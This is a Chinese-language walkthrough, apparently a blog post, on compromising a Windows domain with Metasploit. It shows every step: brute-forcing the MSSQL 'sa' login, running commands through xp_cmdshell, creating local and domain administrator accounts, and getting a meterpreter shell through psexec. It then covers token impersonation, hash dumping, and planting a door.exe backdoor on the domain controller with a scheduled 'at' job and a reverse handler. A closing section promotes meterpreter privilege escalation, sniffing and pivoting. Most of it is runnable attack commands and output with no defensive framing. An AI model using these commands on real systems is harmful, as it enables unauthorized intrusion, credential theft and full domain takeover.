整体框架图

***客户端PC通过SA权限,到内网域***系类_第1张图片

***客户端PC通过SA权限,到内网域***系类_第2张图片

利用msf

use  auxiliary/scanner/portscan/tcp

可以进行扫一些相关的端口。

发现1433端口以后,进行对mssql尝试进行暴力破解

Mssql_login

破解完以后(这个破解也主要看字典)进行mssql自己的特性,xp_cmdshell进行命令操作

 Use Auxiliary/scanner/mssql/mssql_exec

 Set  rhost ip

 Set username sa

Set password 密码

 Set cmd whoami  //这个是重点,在这里进行命令

Exploit

***客户端PC通过SA权限,到内网域***系类_第3张图片

如果是增加用户

Set cmd net users kaifeng kaifeng /add

Exploit

一次命令就算执行完毕,下一次执行命令要重新cmd

Set cmd net localgroup administrators kaifeng /add

Exploit

***执行完毕

利用psexec

进行反弹连接,得到一个meterpreter

 

wKioL1UDxfCy_1oAAABaItV0cf4622.jpg

Run getgui -e

use  auxiliary/scanner/portscan/tcp

Exploit

wKiom1UDxQPBGVJUAABDrD5AJ3U489.jpg

证明3389就打开了

 

开始偷取令牌

Use incognito

List_tokens -u

Impersonate_token 上面列出的令牌

如果成功的话,就已经攻下另外一台主机了。可以进入shell端口进行whoami进行查看

然后建立一个域管理员进行登录,管理整个域

Net users kaifeng kaifeng /add /domain

Net localgroup administrators kaifeng /add /domain

然后利用

Psexec 进行登录,用户名和密码都已经建立

登录成功以后就可以进行查看整个域的管理

通过meterpreter查看整个域的hash值 dumphash

 

 

 

 

如果拿下了一台域管理员以后,要想拿下其他的机子时,可以利用导出hash来拿其他的机子。或者是利用令牌导到别的机子,然后上传一个***,在进入到shell,定好时间执行,在msf进行监听,则可以拿到权限。

在域管理员的下面

meterpreter > upload /var/www/door.exe c:\

meterpreter > shell

C:\WINDOWS\system32>dir c:\

C:\WINDOWS\system32>复制到DIS9域管理机子

C:\>copy door.exe \\DIS9TEAM-DOMAIN\c$
copy door.exe \\DIS9TEAM-DOMAIN\c$

C:\>
获得DIS9TEAM-DOMAIN的时间
C:\>net time \\DIS9TEAM-DOMAIN

C:\>
时间是05.02,添加一项作业 5.04运行***door.exe 然后MSF监听
C:\at \\DIS9TEAM-DOMAIN 05:04 c:\door.exe
at \\DIS9TEAM-DOMAIN 05:04 c:\door.exe

C:\>exit
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > exploit
[*] Started reverse handler on 1.1.1.3:4444
[*] Starting the payload handler..

可以利用这个方法拿下其他机子

知识扩充

特色功能1:快速提权
Getsystem命令快速提权
实在没有比这个简单的了
一条指令你就拥有了System权限

Meterpreter会自己尝试用多种方法让你获得System权限

特色功能2:Hashdump
运行这个命令:run post/windows/gather/hashdump
一条命令你就能够获得Windows的Sam 数据库里的内容
就是经过加密的用户名和密码

特色功能3:直接打开3389
Getgui命令是Meterpreter新添加的命令
这个命令能够让你轻松的在目标系统上打开3389远程管理
这条命令有两个用法:run getgui -e(仅仅是打开远程管理)
run getgui -u hacker -p s3cr3t(打开远程管理并且创造一个新的用户名为Hacker密码为s3cr3t的帐号)

特色功能4:网络嗅探
Meterpreter拥有非常强大的网络嗅探能力
它能够不在目标系统上安装任何驱动的情况下进行网络嗅探
而且它还聪明到了自己的流量要被忽略掉

特色功能5:网络中继
往往***局域网***碰到的最大困难时无法穿过NAT
现在有了Meterpreter就轻松了
Meterpreter能够让一台你已经***的电脑变成中继,来***同一个局域网里的其他电脑